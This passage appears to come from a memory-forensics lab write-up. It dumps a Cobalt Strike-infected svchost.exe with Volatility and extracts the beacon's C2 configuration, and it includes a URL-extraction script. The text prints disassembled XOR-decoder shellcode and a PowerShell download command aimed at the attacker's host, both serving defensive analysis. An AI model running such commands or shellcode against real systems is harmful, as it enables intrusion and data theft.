0xb30022:	mov	r8d, 0x56a2b5f0
0xb30028:	push	4
0xb3002d:	pop	rdx
0xb3002e:	mov	rcx, rdi
0xb30031:	call	rax
0xb30033:	add	byte ptr [rax], al
0xb30035:	add	byte ptr [rax], al
0xb30037:	add	byte ptr [rax], al
0xb30039:	add	byte ptr [rax], al
0xb3003b:	add	al, bh
0xb3003d:	add	byte ptr [rax], al
1488	svchost.exe	0x3160000	0x355ffff	VadS	PAGE_EXECUTE_READWRITE	1024	1	Disabled	
fc 48 83 e4 f0 eb 33 5d	.H....3]
8b 45 00 48 83 c5 04 8b	.E.H....
4d 00 31 c1 48 83 c5 04	M.1.H...
55 8b 55 00 31 c2 89 55	U.U.1..U
00 31 d0 48 83 c5 04 83	.1.H....
e9 04 31 d2 39 d1 74 02	..1.9.t.
eb e7 58 fc 48 83 e4 f0	..X.H...
ff d0 e8 c8 ff ff ff 3d	.......=	
0x3160000:	cld	
0x3160001:	and	rsp, 0xfffffffffffffff0
0x3160005:	jmp	0x316003a
0x3160007:	pop	rbp
0x3160008:	mov	eax, dword ptr [rbp]
0x316000b:	add	rbp, 4
0x316000f:	mov	ecx, dword ptr [rbp]
0x3160012:	xor	ecx, eax
0x3160014:	add	rbp, 4
0x3160018:	push	rbp
0x3160019:	mov	edx, dword ptr [rbp]
0x316001c:	xor	edx, eax
0x316001e:	mov	dword ptr [rbp], edx
0x3160021:	xor	eax, edx
0x3160023:	add	rbp, 4
0x3160027:	sub	ecx, 4
0x316002a:	xor	edx, edx
0x316002c:	cmp	ecx, edx
0x316002e:	je	0x3160032
0x3160030:	jmp	0x3160019
0x3160032:	pop	rax
0x3160033:	cld	
0x3160034:	and	rsp, 0xfffffffffffffff0
0x3160038:	call	rax
0x316003a:	call	0x3160007
remnux@remnux:~/Downloads$

Since it has been flagged as suspicious, investigate it. Dump its memory the same way as the Volatility 2 memory dump earlier.

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393  memdump -p 1488 -D out
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
************************************************************************
Writing svchost.exe [  1488] to 1488.dmp
remnux@remnux:~/Downloads$ 

Use the parser linked above (Sentinel-One's CobaltStrikeParser) to extract the beacon's key.
To set up the parser, clone it from git and then install its packages inside a python3-venv as follows.

remnux@remnux:~/Downloads$ git clone https://github.com/Sentinel-One/CobaltStrikeParser
Cloning into 'CobaltStrikeParser'...
remote: Enumerating objects: 146, done.
remote: Counting objects: 100% (62/62), done.
remote: Compressing objects: 100% (48/48), done.
remote: Total 146 (delta 29), reused 23 (delta 14), pack-reused 84
Receiving objects: 100% (146/146), 988.99 KiB | 8.67 MiB/s, done.
Resolving deltas: 100% (61/61), done.
remnux@remnux:~/Downloads$ python3 -m venv venv
remnux@remnux:~/Downloads$ source ./venv/bin/activate
(venv) remnux@remnux:~/Downloads$ cd CobaltStrikeParser/
(venv) remnux@remnux:~/Downloads/CobaltStrikeParser$ pip install -r requirements.txt 

Now, let's run it! Specify beacon version 4 and parse the dump.

(venv) remnux@remnux:~/Downloads/CobaltStrikeParser$ python3 ./parse_beacon_config.py --version 4 ../out/1488.dmp 
BeaconType                       - HTTP
Port                             - 1337
SleepTime                        - 60000
MaxGetSize                       - 1048576
Jitter                           - 0
MaxDNS                           - 255
PublicKey_MD5                    - fc627cf00878e4d4f7997cb26a80e6fc
C2Server                         - 192.168.144.129,/updates.rss
UserAgent                        - Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) LBBROWSER
HttpPostUri                      - /submit.php
Malleable_C2_Instructions        - Empty
HttpGet_Metadata                 - Metadata
                                   	base64
                                   	header "Cookie"
HttpPost_Metadata                - ConstHeaders
                                   	Content-Type: application/octet-stream
                                   SessionId
                                   	parameter "id"
                                   Output
                                   	print
PipeName                         - 
DNS_Idle                         - 0.0.0.0
DNS_Sleep                        - 0
SSH_Host                         - Not Found
SSH_Port                         - Not Found
SSH_Username                     - Not Found
SSH_Password_Plaintext           - Not Found
SSH_Password_Pubkey              - Not Found
SSH_Banner                       - 
HttpGet_Verb                     - GET
HttpPost_Verb                    - POST
HttpPostChunk                    - 0
Spawnto_x86                      - %windir%\syswow64\rundll32.exe
Spawnto_x64                      - %windir%\sysnative\rundll32.exe
CryptoScheme                     - 0
Proxy_Config                     - Not Found
Proxy_User                       - Not Found
Proxy_Password                   - Not Found
Proxy_Behavior                   - Use IE settings
Watermark_Hash                   - Not Found
Watermark                        - 305419896
bStageCleanup                    - False
bCFGCaution                      - False
KillDate                         - 0
bProcInject_StartRWX             - True
bProcInject_UseRWX               - True
bProcInject_MinAllocSize         - 0
ProcInject_PrependAppend_x86     - Empty
ProcInject_PrependAppend_x64     - Empty
ProcInject_Execute               - CreateThread
                                   SetThreadContext
                                   CreateRemoteThread
                                   RtlCreateUserThread
ProcInject_AllocationMethod      - VirtualAllocEx
bUsesCookies                     - True
HostHeader                       - 
headersToRemove                  - Not Found
DNS_Beaconing                    - Not Found
DNS_get_TypeA                    - Not Found
DNS_get_TypeAAAA                 - Not Found
DNS_get_TypeTXT                  - Not Found
DNS_put_metadata                 - Not Found
DNS_put_output                   - Not Found
DNS_resolver                     - Not Found
DNS_strategy                     - Not Found
DNS_strategy_rotate_seconds      - Not Found
DNS_strategy_fail_x              - Not Found
DNS_strategy_fail_seconds        - Not Found
Retry_Max_Attempts               - Not Found
Retry_Increase_Attempts          - Not Found
Retry_Duration                   - Not Found
(venv) remnux@remnux:~/Downloads/CobaltStrikeParser$ 

Ans: fc627cf00878e4d4f7997cb26a80e6fc

What is the URL of the exfiltrated data?

The cmdline output shows it is used in PID 4596. Dump this one's memory with Volatility 2 too.

remnux@remnux:~/Downloads$ vol.py -f memory.mem --profile=Win2016x64_14393  memdump -p 4596 -D out
Volatility Foundation Volatility Framework 2.6.1
/usr/local/lib/python2.7/dist-packages/volatility/plugins/community/YingLi/ssh_agent_key.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
  from cryptography.hazmat.backends.openssl import backend
************************************************************************
Writing notepad.exe [  4596] to 4596.dmp

Check whether there is a URL near the strings that look like they handle exfiltrator.txt.

remnux@remnux:~/Downloads/out$ strings -e l 4596.dmp | grep -9 exfiltrator.txt | grep https://

21.png
Answer with this.
※ Defanged.

Ans: https[:]//pastebin.com/A0Ljk8tu
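Both `strings -e l ... | grep` steps above (the presist.ps1 download command in the powershell.exe dump and the URL near exfiltrator.txt in the notepad.exe dump) can be reproduced with a small script that also records where in the dump each hit sits, which is handy when the same string appears in several processes. The following Python is an added example, not code from the writeup, from Volatility or from CobaltStrikeParser: it pulls UTF-16LE and ASCII printable runs out of a raw dump, filters them for http and https URLs, and mimics `grep -9 keyword | grep https://` by looking at the strings within a number of neighbours of each keyword hit. SAMPLE_DUMP is a constructed byte buffer, not real memory; pass a `.dmp` path on the command line to run it against a real dump.

```python
import re
import sys


def _wide(text):
    """Encode as UTF-16LE, the encoding `strings -e l` searches for."""
    return text.encode("utf-16-le")


# Constructed sample dump (not real memory): binary filler around a few wide
# strings of the kind seen in the powershell.exe / notepad.exe dumps, plus ASCII
# filler strings so that the keyword window has neighbours to skip over.
SAMPLE_DUMP = (
    b"MZ\x90\x00\x03\x00\x00\x00" + b"\xff" * 16
    + _wide(r"C:\Users\Administrator\Desktop\exfiltrator.txt") + b"\x00\x00"
    + _wide("https://pastebin.com/A0Ljk8tu") + b"\x00\x00"
    + b"".join(b"filler-string-%02d\x00" % i for i in range(10))
    + _wide('Invoke-WebRequest -Uri "http://192.168.144.129:1338/presist.ps1" '
            '-OutFile "./presist.ps1"') + b"\x00\x00"
    + b"\xcc" * 8
)

URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def extract_strings(data, min_len=6):
    """Return (offset, encoding, text) for printable runs: ASCII like `strings`,
    UTF-16LE like `strings -e l`. Only the printable ASCII range is considered,
    as with the GNU tool's defaults."""
    wide_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    found = [(m.start(), "utf-16le", m.group().decode("utf-16-le"))
             for m in wide_re.finditer(data)]
    found += [(m.start(), "ascii", m.group().decode("ascii"))
              for m in ascii_re.finditer(data)]
    # Offset order, so neighbours in the list are neighbours in memory.
    return sorted(found)


def find_urls(strings):
    """Every URL in every extracted string, with the offset and encoding it came from."""
    return [(off, enc, url) for off, enc, text in strings for url in URL_RE.findall(text)]


def urls_near(strings, keyword, window=9):
    """Like `strings ... | grep -<window> keyword | grep https?://`: URLs found in
    strings within `window` positions of any string containing `keyword`."""
    hits = set()
    for i, (_, _, text) in enumerate(strings):
        if keyword in text:
            for _, _, near in strings[max(0, i - window): i + window + 1]:
                hits.update(URL_RE.findall(near))
    return sorted(hits)


if __name__ == "__main__":
    # Reads the whole file; for a 600 MB dump mmap would be gentler on memory.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    strs = extract_strings(data)
    for off, enc, url in find_urls(strs):
        print(f"0x{off:x} {enc:8} {url}")
    print("near exfiltrator.txt:", urls_near(strs, "exfiltrator.txt"))
```

Keeping the offset alongside each hit lets you go back to the dump with a hex viewer and see what surrounds the URL (the PowerShell command it belonged to, or the document text next to a pastebin link), which the plain `strings | grep` pipeline throws away.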

Closing

This was good practice with Volatility, mainly version 3.
Volatility 2 also has features that do not exist in 3 (such as the shell), so I want to practice those too!!!!
(I reached the answers almost entirely by leaning on the windows.cmdline.CmdLine command.)

As always, I hope this is of some help to fellow security engineers.
